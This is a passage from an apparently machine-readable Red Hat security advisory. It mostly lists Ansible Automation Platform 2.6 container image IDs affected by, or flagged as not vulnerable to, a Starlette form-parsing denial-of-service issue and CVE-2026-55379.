"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/aap-must-gather-rhel9@sha256:6458f36f24c26733e1a052ce8a1beac8efed6da6574133103d8dc7b868e580b2_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/aap-must-gather-rhel9@sha256:b1561aa0c5cdc34467541dddd7be145859c3d3d041989d483eb54a720a65ec26_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/aap-must-gather-rhel9@sha256:dbaddb3974c4ca1a4f7e58b0a3d91ba7d2d946100cf55c6acd740a61ad2fb143_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-builder-rhel9@sha256:5049e7dd3ec73b82a0fdc7ba1f5c2ce7bfc4bfee023af24133d1c48eb2838d50_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-builder-rhel9@sha256:7c971a91ac52f6d5e8702548923890afb2aa586731c5092396d3e769516fb7ed_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-builder-rhel9@sha256:c4bc8ce6d217e861df5c0228812c612e9b1c200f3654b26e8bdfd36642b79c57_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-builder-rhel9@sha256:ec267e7bd945593d9bcd3be6201176e5b28376cdd5900d5da8c6f033b0420558_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-dev-tools-rhel9@sha256:97b8905f103277144991667b7953a08fd7a7b2edc448a3d5b5195f1af6802014_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-dev-tools-rhel9@sha256:d7fb722c1e4646d29ee32f5f9a74f7da3c87e07da52a7f28d58017931d375305_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-dev-tools-rhel9@sha256:e779c125e7fd9307e117fc7f4e4411f450871417f0447deb68c3821c26cae764_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-dev-tools-rhel9@sha256:e8113d25fd42fc3a31dc9bb120764c3b508995c23f73f7e99e0200ac411ad229_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9-operator@sha256:2a24b3e44cd208c8176d4739cf3fc7a19e9fff3b531ab7718de6f5a99db4e4d1_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9-operator@sha256:47fa330b3fe99501ba7d4b4bb5bc8b5ba0ea7880472070b27250b36fce3d035c_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9-operator@sha256:71a06d4925ea829abc69b3ab518f08844faeaf524bad4c1e6fbc658b8227e0ab_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9-operator@sha256:fa606a224ac6d3d5e17650a9b9a52e5cb76af57dc767adf79609e0ab95081304_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9@sha256:08cca1f9a75b0352f17d517f6b7bab53ccf7fba7ef1ff5cedf777c5b68dd15fa_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9@sha256:381cb54bf157086017cfea6db2a32895b6109640520b4f35f4791b2295c0db29_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9@sha256:8acf8e32e0dfca8b9a4cfcd765509424a8c1b884ad382a5f21d58e8c44e56cae_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9@sha256:b46b200558db6b92db270ee3749b8d14b778208ab9ab59e2b7c00dc018d2f3ce_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-minimal-rhel9@sha256:30745071ac71a3fdd97d062f180c8fd05d75d9955d4cfccbcf2aeec8deb7f084_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-minimal-rhel9@sha256:3ce796ad0c27b82cd6ba0cd946da69e2d62ad392f60dff571a6e826ab17dd8bc_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-minimal-rhel9@sha256:5c06c479d96b8340382301cb60505f05afcb064d3daf3951df9d8a108b1e4a97_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-minimal-rhel9@sha256:c0a8ca9591bb9385e2a8773aedbb40f84f4f4f229b0ec1b9bf16c4cedef2f6ad_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-supported-rhel9@sha256:a48db0666b33ef1be5ab4ff02d7584c3fa1516c8a18f09295ae6a220d2e2ebf6_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-supported-rhel9@sha256:b475aea1e95b14a065f76a83e5c8aa74f274955297762808f059ed857cd9cb92_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-supported-rhel9@sha256:bf591d6bc29f3c394b29fd34b0a458cee5c3368130f1aa1e226e49fd112c44fc_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-supported-rhel9@sha256:e7369d9a7242b115b78f7ff72c1a59912fb8304e93220a6faeaf44c25c6b5a71_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9-operator@sha256:2a12a79a557dd5e32b77eb977c3698ae2191f015121d38689369ae39f22a5f11_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9-operator@sha256:3b61f49f0dd276d22d67f3e97fb9ffa3382b4a086416f6e59b20ec3e492871cd_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9-operator@sha256:53432365b9bb22c5df6da741687df208111fcabdea834a3fe9159b0ecf4b73df_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9-operator@sha256:9e0ca740576e5ddc2af43456f7a8b1dc74e37a4f0734236848b8fae58a0a2e8b_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9@sha256:38f097e4920d4e64c8b8839fcc353f4ff32e607719b5e36f23e208bc70d75b59_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9@sha256:464caa10ae549dff7824e330f9d5e7e10aacf7b9ee056a6b4aa2768953c94fd8_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9@sha256:9c7fea42d26e687c017aa573fa13b01ee738c88fe11e55317430e4e8b66d339c_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9@sha256:d0a2f84070918986561679893a78e6da279f7680fb7c00bddcc518974ba1e39c_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-ui-rhel9@sha256:361532ae39672ed922d1e23a09c99cc6f3e596e482c0180d9858346b584c9449_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-ui-rhel9@sha256:8a8db7f1d38de954a4d61f8a98cd91edfe182fcf78750fdaaeb3cf3654897a97_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-ui-rhel9@sha256:96403661397e470423486a3016ea895dc68885d9ba7f855921cda3825d974eb3_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-ui-rhel9@sha256:bf9c237fdc696c54f4263caac1c8784fd77a4a2d55dd59f31dc5008a809cf276_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ee-minimal-rhel9@sha256:03b16022be5e25db2bf45e01526c42b782baba00c0b94175d5598fe65574460e_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ee-minimal-rhel9@sha256:6051f354edc4b2e1143062dd5912d55e90f5db762fca6d7fa8df03bc29b06b0d_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ee-minimal-rhel9@sha256:87db0da260805165f54ef956c9e4b1e6a4f6e559306a35558696fb2861422cef_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ee-minimal-rhel9@sha256:e7c8da3d2b7b9c2cfd4240a232b5a388e6ca09927b77b83ca95c66d0270846b0_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ee-supported-rhel9@sha256:63ccd8ad711852fb955c10b1ee57fd3895e50220ce5f1877e58130a7ff8128a6_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ee-supported-rhel9@sha256:6734e6c33e10a5511392126f447a92c57bfd2ef5f3c3650230a5910e3e20fcf1_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ee-supported-rhel9@sha256:7576c16f17a67d327a1b275b34c1612ae3811c849ef163eb44a6c6013659382e_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ee-supported-rhel9@sha256:7dfd8a045a5df672dc2b4f76bff307c0a78c1703e0572f10c1e07bd46e735947_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-proxy-rhel9@sha256:08b6f737eed5ee48478db9bfaceb6e9339e2824ecc1973728c697ceae48a488f_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-proxy-rhel9@sha256:54621aa4ed969de8ec7e3d137178e35ba0fc61c43795e1bd0282c7219bb1d5b0_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-proxy-rhel9@sha256:a9c0c6bcdcb061b85074a7e681c6152e7dc64b85571f2cc17001e18f26276ba8_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-proxy-rhel9@sha256:da378637b565a2793993a1da503bf13f0c1f135e8cc5c6e569f9ee7c8617023c_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9-operator@sha256:2f9958a2ab37aa25749d5cb9eb9d0dc8bf6b79846963c04f95d09bcc061431e9_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9-operator@sha256:63abb6f786ed50165351ec2f03649ef0ff5d05e06a939e2314c8b8b4729e803a_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9-operator@sha256:ad9dd51cd467fa3da27d65919644e364baf3c62a7942c9261ea17b72875d7071_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9-operator@sha256:f5cce04af00f9b56926d067e21e7e252b8d86226f1173f9840ff94d9e8e99d8b_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9@sha256:3bb5c591fa83d61af4a21f63ab1e044aa56f86a89cbda17b77b98a2a3bb088b9_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9@sha256:6f03123e4543be01c7f3b592d55db7793a95d1983a1fe8c3ff2ad1c043cc54a4_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9@sha256:b579af422da0bb4bc6fe17e598ca356e68957b566d9a607ff854ad6039572a56_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9@sha256:eb6a63704d33b1dcb9eefea57763389c0eeb94c6206e63711c95ac3f0163753c_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9-operator@sha256:5148ead7df13311bd0b39fe2f02f4dc6f11d062598944c9b451a6c8e8b0c45f4_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9-operator@sha256:5f8cfecd3442742b867aeba03ea24009fbd89b31cec0dc02eb02c4d9098dfcec_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9-operator@sha256:a595b43d0efdd820048fbb9e7a8cefad5d2d20ae0d271fb16b34dd744b95e9eb_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9-operator@sha256:c1c608e5ee45a6d6248d7657e9b7f17cdb3f8342af9b5e94145217c6fb6efc2a_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9@sha256:71a2f5713323a2d2140d476cb48b66dedeb6f89faf88192dfe40da6c294e2089_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9@sha256:a85326093ec7a9ccde87ea243ad83934707fcef4871fccd934efcba50f355b94_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9@sha256:af2444728b4c244f8e1b56a0f9d9c9325a1887987f25418833df09947f4ed7e5_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9@sha256:e1daf0343f7b3e10b7843f85d64bd0ce35612e333597b7c5b48f033b7ec21c89_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-web-rhel9@sha256:0c3c53caa8ccbea82dfc5dfe795e2e77fc84fd2a485cf0888a095ebe13305363_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-web-rhel9@sha256:50cee84ad72794144820f6b6d08583387ab4e5f0a6d81ea495430290b173b1ea_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-web-rhel9@sha256:660235348fa58da3e9a78c757e0cfc5b7f03c5760b9086d2876d87a20888f6a2_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-web-rhel9@sha256:ab5fb18f89334216119c70498585d74c689cdbf8fd21b5826b782d0b5427051f_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-chatbot-rhel9@sha256:1a440c21e1d882875a73201b3135957387f0d7846678b22b52732e984931099a_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-chatbot-rhel9@sha256:50f2bcf49966112665eb82a30e199af6041624e5cdb2372a85075405acf63ab8_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-chatbot-rhel9@sha256:a4927ab07375561c595afb1898ea52e28a9efb6910bee1011332d23344052e3f_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-chatbot-rhel9@sha256:f69d4d8b4e9ad3666d4fa1aced7a01136f738b49f9c818ee71f7fbd44ff111ec_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9-operator@sha256:45057e5ae8e5a7bb6646bd7896707859539039e409ac334e8cb3eb99c554e031_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9-operator@sha256:5565418214a3480ba6e3a85f56838678549e515e374535813dfdc03700950cb7_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9-operator@sha256:9e97f4cb07e63cc820b988ff3bf7079a087f596341399339f9a94d056ac69301_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9-operator@sha256:fe1c1dc037cf3e7e690092c761452de7111a899c73512ae9132479f7262139f4_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9@sha256:544021b673fcef3bfe5291e0e82ed387d93735b52c983cd7b8b15779f4676ac1_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9@sha256:d0230cc8ceaa4a82381b566d3661a49567f62c47ec8da11e8c96550e30bcb88f_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9@sha256:d1246fb6fa7ff8221d88c00d73fa59ccfdc09eb3260af45adc8ddf568c5a0398_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9@sha256:f5c7dd391581c2549b57ea4a5f61133221d19951ac45ff10952bc26048b71975_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/mcp-tools-rhel9@sha256:389567d267aab51c7fce52a23439c821995099cec9e37f5962a5dc2114597f84_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/mcp-tools-rhel9@sha256:417900ad18144b608fd23c8106aa8824048176eaf5f41eff1af47c43c75b7a89_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/mcp-tools-rhel9@sha256:d4c4bb796641f32563ce478b6fc912d1d809b83220a8843cd440ffadb788d17f_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/mcp-tools-rhel9@sha256:e607ceaa2e3e14859f1ad60b394a1a896c5505662fa17b10f5afd532bda8be9f_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-rhel9-operator@sha256:24d7574341fa646e12ca5180a655271b9d947907af80da860b2dab0b51442d12_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-rhel9-operator@sha256:405eeb4b9ece480096d6b4246999ed043c5c2af47006b50677a5f83df870fbe9_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-rhel9-operator@sha256:653fd44dc56da7c4405e458fdcafdc358e323b1d917b97483cf37068da484088_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-rhel9-operator@sha256:77acabaa8cabde7fca8b90fffd651da92eacd54da6eb76933c749656535ef55c_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-runner-rhel9@sha256:9683a91e7d16893fe030e1701a2500d1e79c7bea0ab7557438b53d281acd14e4_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-runner-rhel9@sha256:9c3bee41f02ed223da8fd3e7a5fc73a67ef82837b947f785a85c6de742c2c75a_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-runner-rhel9@sha256:a15644ebe6166a891d02fd672fa1c83242713096d3754a2fd20aa0627ccf45bf_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-runner-rhel9@sha256:a217de550b6a6509eca369318e2bd9585a70c67756ac9980f933b548de668f8d_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/receptor-rhel9@sha256:184a16150bdf285e1a32a0901871b8fcee6be9529e95de219fd4702d27eeadf0_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/receptor-rhel9@sha256:461fc04f1bc051c5ce6ced0e7d7179e9078dd5545eced38bdc37df7a9c06e722_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/receptor-rhel9@sha256:64a02cef795fdf08d8b1d5c8bcc96c21c0196360ee3976a4afe5bdae98d3bf77_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/receptor-rhel9@sha256:ba3d764e2fcd2d4a8e145a1559bcf9c6daa006c1844ec0f22fecddd18fb39deb_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/ansible-devspaces-rhel9@sha256:33d841d14081ec5f0289e79b6644acb4b5a038f59191493d763d7db4328aeb94_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/ansible-devspaces-rhel9@sha256:7a40a0df543d520528dc35c3fe1c224b298bf24858f29bbedd879f1b23396f55_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/ansible-devspaces-rhel9@sha256:b13680f6f1c058afdca28132b54195532c8cbc0ac634d16591c1a98088933768_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/ansible-devspaces-rhel9@sha256:e037940ea94d2cf16586ec35000a890066860865e992949a28b0a52e18b8b3fa_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/mcp-server-rhel9@sha256:118ad39a5e775943911f5ec803eea0051dc1c720a4b3d3402394e68fa5ca7ca7_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/mcp-server-rhel9@sha256:18f55feaae83ee6506b3af76cdd511687e82995440f87af6e9b9aefa06e726ad_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/mcp-server-rhel9@sha256:644bdbea9feb95628cb142c21d52a2357261a9fd2386ffae978971dd68cad3ec_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/mcp-server-rhel9@sha256:db407b56e08976d1a1014d6248ef3719e3b15dc2171d5281b21a865252c8016a_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/metrics-service-rhel9-operator@sha256:0e36aa1324c5cb24a1217dfb477731e386311c29880dc76453756aca4776080a_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/metrics-service-rhel9-operator@sha256:16a9f451252541eb555f27528fc547724345767b364d913323077743b84b1b7b_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/metrics-service-rhel9-operator@sha256:787d0e6df45128836d907732ca546d054f10f2fd8708ec6fdbdb2418f9445066_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/metrics-service-rhel9-operator@sha256:d7869fb6e7fce7a1a26841475449f9c7c0b9c29445f5c9c5bd226abfa4ba7f26_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/metrics-service-rhel9@sha256:033fec39621ff64fd83905a4d656ecce7907f7c5531855253a682f414702561d_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/metrics-service-rhel9@sha256:5eaeaaf91e9d13054c54d3060ba8380b42b72d1087612f65baca29c036d593a9_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/metrics-service-rhel9@sha256:9bb6427006e96866392ac8804990b85f9ae7b5f4f1575e7d6123a3ab8d4b365e_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/metrics-service-rhel9@sha256:a6ecee20b39158df405c56ed811a882c2ea82a996308b51fad6ac659c669c566_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform/platform-operator-bundle@sha256:62c5e15e425dd562e0a8199e437cdbd2f29e239bd758c25c893ef0a60e767128_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform/platform-operator-bundle@sha256:f72a736351733cb24b8243647309abcdf086f0cb8fe59e12a3e95510917dfb4d_amd64"
]
}
],
"threats": [
{
"category": "impact",
"details": "Important"
}
],
"title": "starlette: Starlette: request.form() limits silently ignored for application/x-www-form-urlencoded enable DoS"
},
{
"cve": "CVE-2026-55379",
"cwe": {
"id": "CWE-770",
"name": "Allocation of Resources Without Limits or Throttling"
},
"discovery_date": "2026-07-06T20:01:29.922515+00:00",
"flags": [
{
"label": "vulnerable_code_not_present",
"product_ids": [
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/aap-must-gather-rhel9@sha256:1e388383c5111049bb8f2d1f37fcee6773067152d256492f7e9db908d52b4652_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/aap-must-gather-rhel9@sha256:6458f36f24c26733e1a052ce8a1beac8efed6da6574133103d8dc7b868e580b2_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/aap-must-gather-rhel9@sha256:b1561aa0c5cdc34467541dddd7be145859c3d3d041989d483eb54a720a65ec26_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/aap-must-gather-rhel9@sha256:dbaddb3974c4ca1a4f7e58b0a3d91ba7d2d946100cf55c6acd740a61ad2fb143_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-builder-rhel9@sha256:5049e7dd3ec73b82a0fdc7ba1f5c2ce7bfc4bfee023af24133d1c48eb2838d50_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-builder-rhel9@sha256:7c971a91ac52f6d5e8702548923890afb2aa586731c5092396d3e769516fb7ed_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-builder-rhel9@sha256:c4bc8ce6d217e861df5c0228812c612e9b1c200f3654b26e8bdfd36642b79c57_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-builder-rhel9@sha256:ec267e7bd945593d9bcd3be6201176e5b28376cdd5900d5da8c6f033b0420558_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-dev-tools-rhel9@sha256:97b8905f103277144991667b7953a08fd7a7b2edc448a3d5b5195f1af6802014_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-dev-tools-rhel9@sha256:d7fb722c1e4646d29ee32f5f9a74f7da3c87e07da52a7f28d58017931d375305_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-dev-tools-rhel9@sha256:e779c125e7fd9307e117fc7f4e4411f450871417f0447deb68c3821c26cae764_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-dev-tools-rhel9@sha256:e8113d25fd42fc3a31dc9bb120764c3b508995c23f73f7e99e0200ac411ad229_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9-operator@sha256:2a24b3e44cd208c8176d4739cf3fc7a19e9fff3b531ab7718de6f5a99db4e4d1_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9-operator@sha256:47fa330b3fe99501ba7d4b4bb5bc8b5ba0ea7880472070b27250b36fce3d035c_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9-operator@sha256:71a06d4925ea829abc69b3ab518f08844faeaf524bad4c1e6fbc658b8227e0ab_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9-operator@sha256:fa606a224ac6d3d5e17650a9b9a52e5cb76af57dc767adf79609e0ab95081304_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9@sha256:08cca1f9a75b0352f17d517f6b7bab53ccf7fba7ef1ff5cedf777c5b68dd15fa_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9@sha256:381cb54bf157086017cfea6db2a32895b6109640520b4f35f4791b2295c0db29_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9@sha256:8acf8e32e0dfca8b9a4cfcd765509424a8c1b884ad382a5f21d58e8c44e56cae_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9@sha256:b46b200558db6b92db270ee3749b8d14b778208ab9ab59e2b7c00dc018d2f3ce_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-minimal-rhel9@sha256:30745071ac71a3fdd97d062f180c8fd05d75d9955d4cfccbcf2aeec8deb7f084_s390x",
